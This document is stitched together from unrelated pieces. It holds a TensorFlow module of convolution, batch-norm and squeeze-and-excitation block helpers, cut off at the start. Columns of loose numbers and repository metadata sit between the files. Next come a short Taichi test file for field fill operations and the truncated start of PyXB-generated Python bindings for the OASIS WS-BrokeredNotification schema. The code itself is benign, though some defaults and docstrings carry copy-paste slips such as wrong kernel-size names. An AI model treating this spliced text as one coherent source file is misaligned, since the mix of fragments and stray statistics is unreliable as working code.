name=name)(x)
if (strides[0] > 1) or (strides[1] > 1):
x = tf.keras.layers.AveragePooling2D(
pool_size=1,
strides=strides,
padding="valid",
data_format=data_format,
name=name + "/stride")(x)
return x
def conv2d(x,
in_channels,
out_channels,
kernel_size,
strides=1,
padding=0,
dilation=1,
groups=1,
use_bias=True,
data_format="channels_last",
name="conv2d"):
"""
Convolution 2D layer wrapper.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
kernel_size : int or tuple/list of 2 int
Convolution window size.
strides : int or tuple/list of 2 int
Strides of the convolution.
padding : int or tuple/list of 2 int
Padding value for convolution layer.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'conv2d'
Layer name.
Returns
-------
Tensor
Resulted tensor.
"""
if isinstance(kernel_size, int):
kernel_size = (kernel_size, kernel_size)
if isinstance(strides, int):
strides = (strides, strides)
if isinstance(padding, int):
padding = (padding, padding)
if isinstance(dilation, int):
dilation = (dilation, dilation)
if (padding[0] > 0) or (padding[1] > 0):
if is_channels_first(data_format):
paddings_tf = [[0, 0], [0, 0], list(padding), list(padding)]
else:
paddings_tf = [[0, 0], list(padding), list(padding), [0, 0]]
x = tf.pad(x, paddings=paddings_tf)
if groups == 1:
x = tf.keras.layers.Conv2D(
filters=out_channels,
kernel_size=kernel_size,
strides=strides,
padding="valid",
data_format=data_format,
dilation_rate=dilation,
use_bias=use_bias,
kernel_initializer=tf.contrib.layers.variance_scaling_initializer(2.0),
name=name)(x)
elif (groups == out_channels) and (out_channels == in_channels):
assert (dilation[0] == 1) and (dilation[1] == 1)
kernel = tf.get_variable(
name=name + "/dw_kernel",
shape=kernel_size + (in_channels, 1),
initializer=tf.variance_scaling_initializer(2.0))
x = tf.nn.depthwise_conv2d(
input=x,
filter=kernel,
strides=(1, 1) + strides if is_channels_first(data_format) else (1,) + strides + (1,),
padding="VALID",
rate=(1, 1),
name=name,
data_format="NCHW" if is_channels_first(data_format) else "NHWC")
if use_bias:
raise NotImplementedError
else:
assert (in_channels % groups == 0)
assert (out_channels % groups == 0)
in_group_channels = in_channels // groups
out_group_channels = out_channels // groups
group_list = []
for gi in range(groups):
if is_channels_first(data_format):
xi = x[:, gi * in_group_channels:(gi + 1) * in_group_channels, :, :]
else:
xi = x[:, :, :, gi * in_group_channels:(gi + 1) * in_group_channels]
xi = tf.keras.layers.Conv2D(
filters=out_group_channels,
kernel_size=kernel_size,
strides=strides,
padding="valid",
data_format=data_format,
dilation_rate=dilation,
use_bias=use_bias,
kernel_initializer=tf.contrib.layers.variance_scaling_initializer(2.0),
name=name + "/convgroup{}".format(gi + 1))(xi)
group_list.append(xi)
x = tf.concat(group_list, axis=get_channel_axis(data_format), name=name + "/concat")
return x
def conv1x1(x,
in_channels,
out_channels,
strides=1,
groups=1,
use_bias=False,
data_format="channels_last",
name="conv1x1"):
"""
Convolution 1x1 layer.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'conv1x1'
Layer name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv2d(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
strides=strides,
groups=groups,
use_bias=use_bias,
data_format=data_format,
name=name)
def conv3x3(x,
in_channels,
out_channels,
strides=1,
padding=1,
groups=1,
use_bias=False,
data_format="channels_last",
name="conv3x3"):
"""
Convolution 3x3 layer.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
padding : int or tuple/list of 2 int, default 1
Padding value for convolution layer.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'conv3x3'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv2d(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=3,
strides=strides,
padding=padding,
groups=groups,
use_bias=use_bias,
data_format=data_format,
name=name)
def depthwise_conv3x3(x,
channels,
strides,
data_format="channels_last",
name="depthwise_conv3x3"):
"""
Depthwise convolution 3x3 layer.
Parameters:
----------
x : Tensor
Input tensor.
channels : int
Number of input/output channels.
strides : int or tuple/list of 2 int
Strides of the convolution.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'depthwise_conv3x3'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv2d(
x=x,
in_channels=channels,
out_channels=channels,
kernel_size=3,
strides=strides,
padding=1,
groups=channels,
use_bias=False,
data_format=data_format,
name=name)
def conv_block(x,
in_channels,
out_channels,
kernel_size,
strides,
padding,
dilation=1,
groups=1,
use_bias=False,
use_bn=True,
activation="relu",
training=False,
data_format="channels_last",
name="conv_block"):
"""
Standard convolution block with Batch normalization and activation.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
kernel_size : int or tuple/list of 2 int
Convolution window size.
strides : int or tuple/list of 2 int
Strides of the convolution.
padding : int or tuple/list of 2 int
Padding value for convolution layer.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
use_bn : bool, default True
Whether to use BatchNorm layer.
activation : function or str or None, default 'relu'
Activation function or name of activation function.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'conv_block'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
x = conv2d(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
strides=strides,
padding=padding,
dilation=dilation,
groups=groups,
use_bias=use_bias,
data_format=data_format,
name=name + "/conv")
if use_bn:
x = batchnorm(
x=x,
training=training,
data_format=data_format,
name=name + "/bn")
if activation is not None:
x = get_activation_layer(
x=x,
activation=activation,
name=name + "/activ")
return x
def conv1x1_block(x,
in_channels,
out_channels,
strides=1,
groups=1,
use_bias=False,
activation="relu",
training=False,
data_format="channels_last",
name="conv1x1_block"):
"""
1x1 version of the standard convolution block.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
activation : function or str or None, default 'relu'
Activation function or name of activation function.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'conv1x1_block'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv_block(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
strides=strides,
padding=0,
groups=groups,
use_bias=use_bias,
activation=activation,
training=training,
data_format=data_format,
name=name)
def conv3x3_block(x,
in_channels,
out_channels,
strides=1,
padding=1,
dilation=1,
groups=1,
use_bias=False,
use_bn=True,
activation="relu",
training=False,
data_format="channels_last",
name="conv3x3_block"):
"""
3x3 version of the standard convolution block.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
padding : int or tuple/list of 2 int, default 1
Padding value for convolution layer.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
use_bn : bool, default True
Whether to use BatchNorm layer.
activation : function or str or None, default 'relu'
Activation function or name of activation function.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'conv3x3_block'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv_block(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=3,
strides=strides,
padding=padding,
dilation=dilation,
groups=groups,
use_bias=use_bias,
use_bn=use_bn,
activation=activation,
training=training,
data_format=data_format,
name=name)
def conv5x5_block(x,
in_channels,
out_channels,
strides=1,
padding=2,
dilation=1,
groups=1,
use_bias=False,
activation="relu",
training=False,
data_format="channels_last",
name="conv3x3_block"):
"""
5x5 version of the standard convolution block.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
padding : int or tuple/list of 2 int, default 2
Padding value for convolution layer.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
activation : function or str or None, default 'relu'
Activation function or name of activation function.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'conv3x3_block'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv_block(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=5,
strides=strides,
padding=padding,
dilation=dilation,
groups=groups,
use_bias=use_bias,
activation=activation,
training=training,
data_format=data_format,
name=name)
def conv7x7_block(x,
in_channels,
out_channels,
strides=1,
padding=3,
use_bias=False,
activation="relu",
training=False,
data_format="channels_last",
name="conv7x7_block"):
"""
3x3 version of the standard convolution block.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
padding : int or tuple/list of 2 int, default 3
Padding value for convolution layer.
use_bias : bool, default False
Whether the layer uses a bias vector.
activation : function or str or None, default 'relu'
Activation function or name of activation function.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'conv7x7_block'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv_block(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=7,
strides=strides,
padding=padding,
use_bias=use_bias,
activation=activation,
training=training,
data_format=data_format,
name=name)
def dwconv3x3_block(x,
in_channels,
out_channels,
strides=1,
padding=1,
dilation=1,
use_bias=False,
activation="relu",
training=False,
data_format="channels_last",
name="dwconv3x3_block"):
"""
3x3 depthwise version of the standard convolution block.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
padding : int or tuple/list of 2 int, default 1
Padding value for convolution layer.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
use_bias : bool, default False
Whether the layer uses a bias vector.
activation : function or str or None, default 'relu'
Activation function or name of activation function.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'dwconv3x3_block'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv3x3_block(
x=x,
in_channels=in_channels,
out_channels=out_channels,
strides=strides,
padding=padding,
dilation=dilation,
groups=out_channels,
use_bias=use_bias,
activation=activation,
training=training,
data_format=data_format,
name=name)
def dwconv5x5_block(x,
in_channels,
out_channels,
strides=1,
padding=2,
dilation=1,
use_bias=False,
activation="relu",
training=False,
data_format="channels_last",
name="dwconv3x3_block"):
"""
5x5 depthwise version of the standard convolution block.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
padding : int or tuple/list of 2 int, default 2
Padding value for convolution layer.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
use_bias : bool, default False
Whether the layer uses a bias vector.
activation : function or str or None, default 'relu'
Activation function or name of activation function.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'dwconv3x3_block'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv5x5_block(
x=x,
in_channels=in_channels,
out_channels=out_channels,
strides=strides,
padding=padding,
dilation=dilation,
groups=out_channels,
use_bias=use_bias,
activation=activation,
training=training,
data_format=data_format,
name=name)
def pre_conv_block(x,
in_channels,
out_channels,
kernel_size,
strides,
padding,
return_preact=False,
training=False,
data_format="channels_last",
name="pre_conv_block"):
"""
Convolution block with Batch normalization and ReLU pre-activation.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
kernel_size : int or tuple/list of 2 int
Convolution window size.
strides : int or tuple/list of 2 int
Strides of the convolution.
padding : int or tuple/list of 2 int
Padding value for convolution layer.
return_preact : bool, default False
Whether return pre-activation. It's used by PreResNet.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'pre_conv_block'
Block name.
Returns
-------
tuple of two Tensors
Resulted tensor and preactivated input tensor.
"""
x = batchnorm(
x=x,
training=training,
data_format=data_format,
name=name + "/bn")
x = tf.nn.relu(x, name=name + "/activ")
if return_preact:
x_pre_activ = x
x = conv2d(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
strides=strides,
padding=padding,
use_bias=False,
data_format=data_format,
name=name + "/conv")
if return_preact:
return x, x_pre_activ
else:
return x
def pre_conv1x1_block(x,
in_channels,
out_channels,
strides=1,
return_preact=False,
training=False,
data_format="channels_last",
name="pre_conv1x1_block"):
"""
1x1 version of the pre-activated convolution block.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
return_preact : bool, default False
Whether return pre-activation. It's used by PreResNet.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'pre_conv1x1_block'
Block name.
Returns
-------
tuple of two Tensors
Resulted tensor and preactivated input tensor.
"""
return pre_conv_block(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
strides=strides,
padding=0,
return_preact=return_preact,
training=training,
data_format=data_format,
name=name)
def pre_conv3x3_block(x,
in_channels,
out_channels,
strides=1,
return_preact=False,
training=False,
data_format="channels_last",
name="pre_conv3x3_block"):
"""
3x3 version of the pre-activated convolution block.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
return_preact : bool, default False
Whether return pre-activation. It's used by PreResNet.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'pre_conv3x3_block'
Block name.
Returns
-------
tuple of two Tensors
Resulted tensor and preactivated input tensor.
"""
return pre_conv_block(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=3,
strides=strides,
padding=1,
return_preact=return_preact,
training=training,
data_format=data_format,
name=name)
def channel_shuffle(x,
groups,
data_format):
"""
Channel shuffle operation from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
x : Tensor
Input tensor.
groups : int
Number of groups.
data_format : str
The ordering of the dimensions in tensors.
Returns
-------
keras.Tensor
Resulted tensor.
"""
x_shape = x.get_shape().as_list()
if is_channels_first(data_format):
channels = x_shape[1]
height = x_shape[2]
width = x_shape[3]
else:
height = x_shape[1]
width = x_shape[2]
channels = x_shape[3]
assert (channels % groups == 0)
channels_per_group = channels // groups
if is_channels_first(data_format):
x = tf.reshape(x, shape=(-1, groups, channels_per_group, height, width))
x = tf.transpose(x, perm=(0, 2, 1, 3, 4))
x = tf.reshape(x, shape=(-1, channels, height, width))
else:
x = tf.reshape(x, shape=(-1, height, width, groups, channels_per_group))
x = tf.transpose(x, perm=(0, 1, 2, 4, 3))
x = tf.reshape(x, shape=(-1, height, width, channels))
return x
def channel_shuffle2(x,
groups,
data_format):
"""
Channel shuffle operation from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
The alternative version.
Parameters:
----------
x : Tensor
Input tensor.
groups : int
Number of groups.
data_format : str
The ordering of the dimensions in tensors.
Returns
-------
keras.Tensor
Resulted tensor.
"""
x_shape = x.get_shape().as_list()
if is_channels_first(data_format):
channels = x_shape[1]
height = x_shape[2]
width = x_shape[3]
else:
height = x_shape[1]
width = x_shape[2]
channels = x_shape[3]
assert (channels % groups == 0)
channels_per_group = channels // groups
if is_channels_first(data_format):
x = tf.reshape(x, shape=(-1, channels_per_group, groups, height, width))
x = tf.transpose(x, perm=(0, 2, 1, 3, 4))
x = tf.reshape(x, shape=(-1, channels, height, width))
else:
x = tf.reshape(x, shape=(-1, height, width, channels_per_group, groups))
x = tf.transpose(x, perm=(0, 1, 2, 4, 3))
x = tf.reshape(x, shape=(-1, height, width, channels))
return x
def se_block(x,
channels,
reduction=16,
activation="relu",
data_format="channels_last",
name="se_block"):
"""
Squeeze-and-Excitation block from 'Squeeze-and-Excitation Networks,' https://arxiv.org/abs/1709.01507.
Parameters:
----------
x : Tensor
Input tensor.
channels : int
Number of channels.
reduction : int, default 16
Squeeze reduction value.
activation : function or str, default 'relu'
Activation function or name of activation function.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
name : str, default 'se_block'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
assert(len(x.shape) == 4)
mid_cannels = channels // reduction
pool_size = x.shape[2:4] if is_channels_first(data_format) else x.shape[1:3]
w = tf.keras.layers.AveragePooling2D(
pool_size=pool_size,
strides=1,
data_format=data_format,
name=name + "/pool")(x)
w = conv1x1(
x=w,
in_channels=channels,
out_channels=mid_cannels,
use_bias=True,
data_format=data_format,
name=name + "/conv1/conv")
w = get_activation_layer(
x=w,
activation=activation,
name=name + "/activ")
w = conv1x1(
x=w,
in_channels=mid_cannels,
out_channels=channels,
use_bias=True,
data_format=data_format,
name=name + "/conv2/conv")
w = tf.nn.sigmoid(w, name=name + "/sigmoid")
x = x * w
return x
| 29.373438
| 120
| 0.575882
| 4,413
| 37,598
| 4.771584
| 0.052119
| 0.052239
| 0.047823
| 0.025265
| 0.869212
| 0.849931
| 0.829938
| 0.80871
| 0.794605
| 0.772
| 0
| 0.018343
| 0.335896
| 37,598
| 1,279
| 121
| 29.396403
| 0.824983
| 0.416777
| 0
| 0.755973
| 0
| 0
| 0.047195
| 0
| 0
| 0
| 0
| 0
| 0.011945
| 1
| 0.040956
| false
| 0
| 0.005119
| 0
| 0.088737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a04e9649b1909d2c07b1404ed0bf78ab3daae45
| 1,305
|
py
|
Python
|
tests/python/test_fill.py
|
winnerineast/taichi
|
57ae0abc374e0df8f0b54bde4bcb92d9d97ed269
|
[
"MIT"
] | null | null | null |
tests/python/test_fill.py
|
winnerineast/taichi
|
57ae0abc374e0df8f0b54bde4bcb92d9d97ed269
|
[
"MIT"
] | null | null | null |
tests/python/test_fill.py
|
winnerineast/taichi
|
57ae0abc374e0df8f0b54bde4bcb92d9d97ed269
|
[
"MIT"
] | null | null | null |
import taichi as ti
@ti.all_archs
def test_fill_scalar():
val = ti.var(ti.i32)
n = 4
m = 7
@ti.layout
def values():
ti.root.dense(ti.ij, (n, m)).place(val)
for i in range(n):
for j in range(m):
val[i, j] = i + j * 3
val.fill(2)
for i in range(n):
for j in range(m):
assert val[i, j] == 2
@ti.all_archs
def test_fill_matrix_scalar():
val = ti.Vector(2, 3, ti.i32)
n = 4
m = 7
@ti.layout
def values():
ti.root.dense(ti.ij, (n, m)).place(val)
for i in range(n):
for j in range(m):
for p in range(2):
for q in range(3):
val[i, j][p, q] = i + j * 3
val.fill(2)
for i in range(n):
for j in range(m):
for p in range(2):
for q in range(3):
assert val[i, j][p, q] == 2
@ti.all_archs
def test_fill_matrix_matrix():
val = ti.Vector(2, 3, ti.i32)
n = 4
m = 7
@ti.layout
def values():
ti.root.dense(ti.ij, (n, m)).place(val)
for i in range(n):
for j in range(m):
for p in range(2):
for q in range(3):
val[i, j][p, q] = i + j * 3
mat = ti.Matrix([[0, 1, 2], [2, 3, 4]])
val.fill(mat)
for i in range(n):
for j in range(m):
for p in range(2):
for q in range(3):
assert val[i, j][p, q] == mat.get_entry(p, q)
| 17.4
| 55
| 0.514176
| 260
| 1,305
| 2.534615
| 0.153846
| 0.212443
| 0.054628
| 0.100152
| 0.85129
| 0.85129
| 0.819423
| 0.819423
| 0.734446
| 0.734446
| 0
| 0.041341
| 0.314176
| 1,305
| 74
| 56
| 17.635135
| 0.694972
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054545
| 1
| 0.109091
| false
| 0
| 0.018182
| 0
| 0.127273
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0a15fe42844a2fc3c076f20a549cbca350e90d38
| 68,765
|
py
|
Python
|
dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/raw/wsrf_br.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 8
|
2019-10-07T16:33:47.000Z
|
2020-12-07T03:59:58.000Z
|
dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/raw/wsrf_br.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | null | null | null |
dev/Tools/Python/2.7.13/mac/Python.framework/Versions/2.7/lib/python2.7/site-packages/pyxb/bundles/wssplat/raw/wsrf_br.py
|
jeikabu/lumberyard
|
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
|
[
"AML"
] | 5
|
2020-08-27T20:44:18.000Z
|
2021-08-21T22:54:11.000Z
|
# ./pyxb/bundles/wssplat/raw/wsrf_br.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:dd5653a4ef6cf46e4740ac1eaece204a915200aa
# Generated 2014-10-19 06:25:00.905939 by PyXB version 1.2.4 using Python 2.7.3.final.0
# Namespace http://docs.oasis-open.org/wsn/br-2
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:906eb6e4-5782-11e4-b088-c8600024e903')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# Import bindings for namespaces imported into schema
import pyxb.bundles.wssplat.wsa
import pyxb.bundles.wssplat.wstop
import pyxb.binding.datatypes
import pyxb.bundles.wssplat.wsrf_bf
import pyxb.bundles.wssplat.wsnt
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://docs.oasis-open.org/wsn/br-2', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
_Namespace_wsn_b = pyxb.bundles.wssplat.wsnt.Namespace
_Namespace_wsn_b.configureCategories(['typeBinding', 'elementBinding'])
_Namespace_wstop = pyxb.bundles.wssplat.wstop.Namespace
_Namespace_wstop.configureCategories(['typeBinding', 'elementBinding'])
_Namespace_wsrf_bf = pyxb.bundles.wssplat.wsrf_bf.Namespace
_Namespace_wsrf_bf.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 57, 12)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://docs.oasis-open.org/wsn/b-2}TopicExpression uses Python identifier TopicExpression
__TopicExpression = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpression'), 'TopicExpression', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_httpdocs_oasis_open_orgwsnb_2TopicExpression', True, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 71, 2), )
TopicExpression = property(__TopicExpression.value, __TopicExpression.set, None, None)
# Element {http://docs.oasis-open.org/wsn/b-2}FixedTopicSet uses Python identifier FixedTopicSet
__FixedTopicSet = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'FixedTopicSet'), 'FixedTopicSet', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_httpdocs_oasis_open_orgwsnb_2FixedTopicSet', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 72, 2), )
FixedTopicSet = property(__FixedTopicSet.value, __FixedTopicSet.set, None, None)
# Element {http://docs.oasis-open.org/wsn/b-2}TopicExpressionDialect uses Python identifier TopicExpressionDialect
__TopicExpressionDialect = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(_Namespace_wsn_b, 'TopicExpressionDialect'), 'TopicExpressionDialect', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_httpdocs_oasis_open_orgwsnb_2TopicExpressionDialect', True, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsnt.xsd', 73, 2), )
TopicExpressionDialect = property(__TopicExpressionDialect.value, __TopicExpressionDialect.set, None, None)
# Element {http://docs.oasis-open.org/wsn/br-2}RequiresRegistration uses Python identifier RequiresRegistration
__RequiresRegistration = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'RequiresRegistration'), 'RequiresRegistration', '__httpdocs_oasis_open_orgwsnbr_2_CTD_ANON_httpdocs_oasis_open_orgwsnbr_2RequiresRegistration', False, pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 43, 3), )
RequiresRegistration = property(__RequiresRegistration.value, __RequiresRegistration.set, None, None)
# Element {http://docs.oasis-open.org/wsn/t-1}TopicSet uses Python identifier TopicSet
